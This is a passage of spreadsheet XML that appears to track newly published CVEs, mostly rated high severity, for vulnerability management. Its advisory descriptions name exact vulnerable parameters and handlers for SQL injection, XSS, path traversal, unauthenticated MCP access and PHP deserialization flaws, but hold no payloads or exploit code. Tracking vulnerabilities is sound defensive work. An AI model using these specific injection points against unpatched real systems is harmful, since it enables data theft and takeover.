        <is>
          <t>ITFlow provides an IT documentation, ticketing and accounting system for small managed service providers. Prior to version 26.07, an authenticated user with module_support write permission and access to a credential record can perform time-based blind SQL injection through the expires parameter of the share_generate_link handler in agent/ajax.php. sanitizeInput applies string-context escaping, but expires is inserted unquoted into the item_expire_at MySQL INTERVAL expression, allowing a crafted expression and interval unit to execute conditional database queries whose results are inferred from response delays. This can expose password hashes, SMTP credentials, API keys, encrypted vault data, and database metadata and support administrative takeover after credential cracking. This issue is fixed in version 26.07.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54597</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54253</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>TS3 Manager is modern web interface for maintaining Teamspeak3 servers. Prior to 2.2.6, the /api/download handler in packages/server/routes/api.js passes the attacker-controlled port query parameter to socket.connect(port, host) and returns the resulting error.message through res.status(400).send(error.message) as text/html without a Content Security Policy. When a logged-in operator follows a crafted top-level link, the reflected value executes in the manager origin. The token cookie set in packages/ui/src/store/modules/query.js lacks HttpOnly, Secure, and an explicit SameSite attribute, allowing the script to read the token and call the autofillform event in packages/server/socket.js. autofillform returns the decoded JWT, including the cleartext ServerQuery password, enabling operator-session hijacking and control of the managed TeamSpeak server when the operator uses administrative ServerQuery credentials. A valid operator session and user interaction are required. This issue is fixed in 2.2.6.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54253</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54354</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>MapServer is a system for developing web-based GIS applications. Prior to 8.6.4, MapServer's PostGIS runtime filter translation in src/mappostgis.cpp and msPostGISLayerTranslateFilter() treats a filteritem as numeric when CONNECTIONTYPE POSTGIS and metadata such as gml_&lt;item&gt;_type=Integer are configured, but it does not verify that attacker-controlled CGI qstring or OGC API Features featureId input is a numeric literal. The unquoted input is concatenated into the generated PostgreSQL/PostGIS predicate, allowing an unauthenticated remote attacker with access to an affected query endpoint to bypass predicates, enumerate unintended records, perform boolean-based or time-based SQL injection, and increase database load. The issue does not by itself establish database modification capabilities. This issue is fixed in version 8.6.4.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54354</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54451</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>Elixir protobuf is a pure Elixir implementation of Google Protobuf. From 0.8.0 until 0.16.1, services that decode attacker-controlled protobuf bytes with Protobuf.Decoder can be taken offline when the schema contains a self-referential or cyclic message type. In lib/protobuf/decoder.ex, Protobuf.Decoder.value_for_field/3 handles an embedded?: true field by recursively entering the decode / build_message / handle_value / value_for_field call chain without enforcing a nesting-depth limit. Deeply nested embedded fields retain non-tail recursive frames, allowing a comparatively small request to consume substantial CPU and memory, pin a BEAM scheduler, and exhaust the node. This issue is fixed in version 0.16.1.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54451</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56795</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr"/>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>Dell Server Update Utility, versions prior to 26.07.01, contains an Uncontrolled Search Path Element vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Code execution.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56795</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82760</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>Inefficient Algorithmic Complexity vulnerability in team-alembic AshAuthentication allows an unauthenticated attacker to exhaust CPU and memory via an oversized base62 segment in a submitted API key.
AshAuthentication.Base.decode62/1 in lib/ash_authentication/base.ex splits its argument into one binary per character and folds it with charval62/2, which recomputes Integer.pow(62, index) at every position instead of accumulating by Horner's method, so cost grows roughly cubically in the input length. bindecode62/1 in the same module is quadratic through Integer.undigits/2 and Integer.digits/2. Neither function caps byte_size/1, and AshAuthentication.Strategy.ApiKey.SignInPreparation passes the underscore-separated segments of the submitted key straight into both, before any key lookup and without prior authentication. The surrounding rescue clauses catch exceptions, not CPU or memory exhaustion.
This issue affects ash_authentication: from 4.8.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82760</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85077</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-113</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>Sanic is an opensource python web server/framework. Prior to version 24.12.1, and in version 25.12.0, the HTTP/1.1 response pipeline in sanic/response/types.py serializes response header names and values without rejecting carriage-return or line-feed characters. Applications that place attacker-controlled data in response.headers, file(..., filename=...), or cookie path and domain attributes can therefore emit injected headers and may split responses. Depending on application and proxy behavior, this can enable session fixation through injected cookies, cache poisoning, or security-header corruption. This issue is fixed in versions 24.12.1 and 25.12.1.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85077</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86039</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr">
        <is>
          <t>npm:@libp2p/peer-store</t>
        </is>
      </c>
      <c r="M124" s="5" t="inlineStr">
        <is>
          <t>12.0.24</t>
        </is>
      </c>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-345</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. From 8.0.0 until 12.0.24, @libp2p/peer-store in packages/peer-store/src/index.ts uses consumePeerRecord to verify a RecordEnvelope signature but does not require PeerRecord.peerId in the signed payload to equal the signer peer ID derived by RecordEnvelope.openAndCertify. The expectedPeer option checks only the envelope signer, and the gossipsub Peer Exchange path can provide the attacker's own peer ID as expectedPeer. An attacker can therefore sign a record with the attacker's key, place a victim peer ID and attacker-controlled multiaddrs in the payload, and have certified addresses stored for the victim. The poisoned addresses can cause address-book corruption, dial redirection or failure, routing manipulation, and reachability disruption, although the connection upgrade still verifies remote peer identity and prevents a complete identity takeover. The issue is fixed in version 12.0.24.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86039</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92903</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>412d305a-227d-44f9-a262-a31ba44f2aea</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Snowflake CLI versions prior to 3.27.0 allowed unsanitized user-controlled values to be interpolated into SQL strings that are executed as multi-statement queries. An attacker who is able to supply a malicious project configuration file or craft command-line input can cause Snowflake CLI to execute attacker-controlled SQL statements in the context of the victim's Snowflake session and active role. Successful exploitation requires either write or pull-request access to a project repository whose CI/CD pipeline runs Snowflake CLI under an elevated service account role, or the ability to supply untrusted input to CLI-wrapping automation. Impact is limited by the privileges held by the configured Snowflake role at execution time. The fix is available in Snowflake CLI version 3.27.0, which also addresses several additional security findings. Users must manually upgrade.</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92903</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26950</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>Dell SmartFabric Manager, versions prior to 2.2.1, contains an Insufficient Verification of Data Authenticity vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26950</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54446</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>NetLicensing MCP Server is a natural-language interface that enables agentic applications to manage the software-licensing lifecycle in Labs64 NetLicensing. Prior to 0.1.6, network-reachable HTTP transport requests to /mcp that omit x-netlicensing-api-key, Authorization: Bearer, and the apikey query parameter pass through ApiKeyMiddleware in src/netlicensing_mcp/server.py without authentication. The downstream api_key_ctx in src/netlicensing_mcp/client.py then falls back to the operator's NETLICENSING_API_KEY and authenticates upstream NetLicensing REST API calls under the operator account. An unauthenticated attacker can invoke MCP tools to enumerate products, licenses, licensees, and transactions, create or modify licensing objects, perform validations, and execute destructive delete operations. The issue affects HTTP deployments configured with a server-side key and does not require user interaction. This issue is fixed in version 0.1.6.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54446</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54520</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>AI Agent Automation is a modular AI agent workflow automation platform with schedulers, tools, and observability. Prior to 0.9.1, the executeStep file-step implementation in backend/src/agents/executor.js passes the user-controlled step.path value through path.resolve with process.cwd() and then uses the resulting path for read or write operations without checking that it remains in an approved workflow directory. An authenticated user who can create or modify workflow file steps can supply traversal segments to escape the intended workspace and read sensitive files or write and overwrite files accessible to the backend process, including application-adjacent files when process permissions allow. This issue is fixed in version 0.9.1.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54520</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54596</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr"/>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>ITFlow provides an IT documentation, ticketing and accounting system for small managed service providers. Prior to version 26.07, an authenticated Technician or higher with access to at least one client invoice can inject SQL through the frequency parameter handled by agent/post/recurring_invoice.php. The handler passes recurring_invoice_frequency through sanitizeInput but interpolates it unquoted into DATE_ADD, allowing SQL syntax to escape the interval expression, assign additional INSERT columns, store subquery results in recurring_invoice_note, and expose those results through agent/recurring_invoice.php. The persisted recurring_invoice_frequency can execute again when Force Recurring uses it in a later UPDATE, allowing another legitimate user to trigger the second-order injection. This can expose password hashes, SMTP credentials, user records, and database metadata, modify database fields, and enable administrative takeover after credential cracking. This issue is fixed in version 26.07.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54596</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76834</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>b2evolution CMS versions 6.7.8 through 7.2.5 contain an incomplete fix for CVE-2016-8901 where the serialized-array object check in param_check_serialized_array() fails to reject payloads with negative integer array keys. Unauthenticated attackers can submit crafted serialized PHP objects via POST requests to htsrv/call_plugin.php that bypass validation and reach unserialize(), instantiating arbitrary PHP objects with attacker-chosen properties that may enable code execution if suitable POP gadget chains exist.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76834</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81442</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Privilege Management vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information tampering and Unauthorized access.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
